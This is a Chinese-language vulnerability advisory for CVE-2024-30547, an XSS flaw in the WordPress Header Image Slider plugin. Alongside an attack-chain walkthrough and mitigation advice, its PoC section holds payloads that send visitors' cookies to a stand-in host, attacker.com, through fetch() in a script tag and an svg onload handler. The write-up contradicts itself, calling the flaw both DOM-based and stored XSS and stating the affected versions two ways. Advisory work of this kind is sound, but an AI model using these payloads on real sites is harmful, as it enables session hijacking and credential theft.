CVE-2024-30547 WordPress Header Image Slider插件DOM型XSS漏洞

漏洞信息

漏洞编号

CVE-2024-30547

漏洞类型

DOM型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Header Image Slider (WordPress插件)

漏洞概述

CVE-2024-30547是WordPress Header Image Slider插件中的一个存储型跨站脚本(XSS)漏洞，CVSS评分7.1，属于高危漏洞。该漏洞由于插件在处理用户输入时未能正确对特殊字符进行HTML转义，导致攻击者可以在网页中注入恶意JavaScript代码。当其他用户访问包含恶意代码的页面时，攻击脚本会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。攻击者利用该漏洞可以获取受害者的Cookie、劫持用户会话、修改网页内容或进行进一步的攻击。由于该漏洞属于存储型XSS，恶意代码会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击。

技术细节

该漏洞存在于Header Image Slider插件的0.3及以下版本中。漏洞产生的根本原因是插件在前端输出用户可控的数据时未进行充分的输入验证和输出编码。具体来说，插件在处理幻灯片标题、描述或URL参数时，直接将用户输入的内容插入到HTML页面中而未进行HTML实体转义。攻击者可以通过上传恶意构造的幻灯片数据，在标题或描述字段中嵌入恶意脚本代码，如<script>alert(document.cookie)</script>。当页面加载时，浏览器会解析并执行这些恶意代码。由于该漏洞属于DOM型XSS，恶意代码的执行完全发生在客户端浏览器中，传统的服务器端WAF可能无法有效检测和阻断此类攻击。攻击者利用此漏洞可以窃取用户的认证令牌、session信息或其他敏感数据。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Header Image Slider插件版本

STEP 2

步骤2: 漏洞探测

攻击者访问插件管理页面，尝试在幻灯片标题或描述字段注入XSS测试载荷

STEP 3

步骤3: 恶意代码注入

攻击者在插件的输入字段中注入包含恶意JavaScript的载荷，如<script>标签或事件处理器属性

STEP 4

步骤4: 代码存储

恶意载荷被保存到WordPress数据库中，作为幻灯片数据的一部分

STEP 5

步骤5: 受害者访问

当其他用户访问包含该幻灯片的页面时，浏览器会渲染页面并执行注入的恶意脚本

STEP 6

步骤6: 攻击完成

恶意脚本执行后，攻击者可以窃取用户Cookie、会话信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2024-30547 PoC - Header Image Slider DOM-based XSS -->
<!-- Attack Vector: Inject malicious script in slide title/description field -->

<!-- Step 1: Malicious payload to be injected -->
<script>
  // Steal cookies and send to attacker controlled server
  var stolen_data = document.cookie;
  var attacker_server = 'https://attacker.com/steal?data=' + encodeURIComponent(stolen_data);
  fetch(attacker_server);
  
  // Alternative payload - session hijacking
  alert('XSS Triggered! Cookie: ' + document.cookie);
</script>

<!-- Simpler payload for testing -->
<img src=x onerror="alert('DOM XSS - CVE-2024-30547')">

<!-- URL-based XSS trigger -->
<!-- http://target-site.com/?slider_id=<script>alert(document.domain)</script> -->

<!-- WordPress admin panel exploitation -->
<!-- In Header Image Slider settings, add slide with title containing: -->
<svg/onload=fetch('http://attacker.com/log?cookie='+document.cookie)>

影响范围

Header Image Slider 0.3及以下所有版本

Header Image Slider < 0.3

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1) 临时禁用Header Image Slider插件；2) 在Web服务器层面配置XSS过滤规则；3) 实施严格的Content-Security-Policy头部限制脚本执行；4) 对所有用户输入实施白名单验证；5) 加强WordPress管理员账户的安全措施，包括使用强密码和双因素认证；6) 限制具有插件管理权限的用户账户数量；7) 监控网站日志中的异常请求模式。